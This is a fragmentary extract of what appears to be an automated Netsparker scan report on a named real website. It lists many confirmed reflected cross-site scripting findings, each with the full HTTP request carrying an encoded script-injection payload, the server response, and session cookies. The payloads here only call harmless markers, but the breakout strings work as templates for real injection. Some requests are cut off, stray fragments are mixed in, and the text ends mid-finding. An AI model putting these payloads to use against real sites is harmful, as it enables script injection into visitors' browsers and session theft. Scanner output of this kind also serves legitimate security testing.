RequestGET /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00013F)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:38 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 166Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/pitgam'"-->netsparker(0x00013F)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:01:43 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/gvideo/style/style.css'"-->netsparker(0x000452)script>style>netsparker(0x00012E)script>style>

3.17. /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/sc..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x0004E9)

RequestGET /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E9)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:46 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/page/'"-->netsparker(0x0004E9)script>style>

RequestGET /about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00052F)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:11 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/about/search/'"-->netsparker(0x00052F)script>style>netsparker(0x0003B2) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 180Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/js/upload_image.asp?'"-->netsparker(0x0003B2)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:56:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 181Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/site/alon/archive.asp'"-->netsparker(0x00029F)script>style>

''''-->netsparker(0x000245)

0

3.24. /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x0001CB)

RequestGET /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/tags/tags.asp'"-->netsparker(0x0001CB)script>style>netsparker(0x00040D) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:55 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 171Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/js/+ win +?'"-->netsparker(0x00040D)script>style>

3.26. /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x000127)

RequestGET /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000127)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/jAccordion/default.css'"-->netsparker(0x000127)script>style>

3.28. /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x00046E)

RequestGET /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00046E)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:02:57 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 172Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/contact/reg/'"-->netsparker(0x00046E)script>style>

RequestGET /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FD)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:07 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 168Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/scripts/'"-->netsparker(0x0000FD)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:33 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 186Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/contact/search/default.asp'"-->netsparker(0x0004D2)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:37 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/kaftorim/'"-->netsparker(0x00057E)script>style>

alert(0x000642)

RequestPOST /ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000642)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/ask/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 37Accept-Encoding: gzip, deflate

emailtonews=netsparker%40example.com&

38 / 146

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:07:54 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 186Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/ask/reg/maillingUpdate.asp'"-->netsparker(0x000642)script>style>netsparker(0x0002B1)script>style>

3.39. /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/scri..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x0000D7)

RequestGET /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000D7)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:43:52 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 163Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/js/'"-->netsparker(0x0000D7)script>style>

3.41. /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x00028A)

RequestGET /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00028A)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: privateDate: Tue, 20 May 2014 13:56:05 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETContent-Encoding: Vary: Accept-EncodingTransfer-Encoding: chunked

404;http://www.shalomlaam.co.il:80/site/contact/'"-->netsparker(0x00028A)script>style>

RequestGET /site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002DC)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:56:55 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 178Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/site/Presentation/'"-->netsparker(0x0002DC)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:09 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/site/'"-->netsparker(0x000106)script>style>netsparker(0x0003EB) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:35 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 177Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/js/getbanner.asp?'"-->netsparker(0x0003EB)script>style>

3.48. /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x000134)

RequestGET /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000134)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:28 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 177Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/gvideo/index.html'"-->netsparker(0x000134)script>style>

3.50. /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001..

ParametersParameter Type Value

id GET 805

URI-BASED Full URL '"-->alert(0x000195)

RequestGET /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000195)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:46:57 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 174Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/ask/answer.asp'"-->netsparker(0x000195)script>style>

3.52. /images/pagetop.asp CONFIRMEDhttp://www.shalomlaam.co.il/images/pagetop.asp?'"-->alert(0x0003EA)

ParametersParameter Type Value

Query Based Query String '"-->alert(0x0003EA)

RequestGET /images/pagetop.asp?'"-->netsparker(0x0003EA) HTTP/1.1Referer: http://www.shalomlaam.co.il/images/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:34 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 179Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/images/pagetop.asp?'"-->netsparker(0x0003EA)script>style>alert(0x000560)

46 / 146

RequestGET /about/search/default.asp?'"-->netsparker(0x000560) HTTP/1.1Referer: http://www.shalomlaam.co.il/about/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:25 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 185Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/about/search/default.asp?'"-->netsparker(0x000560)script>style>

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:49 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/news/'"-->netsparker(0x000400)script>style>netsparker(0x000160)script>style>

3.59. /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x0000E8)

RequestGET /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E8)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:43:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 183Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/site/gallery/highslide/'"-->netsparker(0x0000E8)script>style>

3.61. /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x00011E)

RequestGET /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00011E)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:18 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 178Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/home/home_page.css'"-->netsparker(0x00011E)script>style>

3.63. /vod/vod.asp CONFIRMEDhttp://www.shalomlaam.co.il/vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

ParametersParameter Type Value

id GET '"-->alert(0x00015D)

RequestGET /vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015D)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

Response';}

netsparker(0x00015D)_fix.mp4" type="video/mp4">-->

Your browser does not support the video tag.

3.65. /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%..

ParametersParameter Type Value

URI-BASED Full URL '"-->alert(0x0004E2)

RequestGET /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E2)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:44 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 170Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

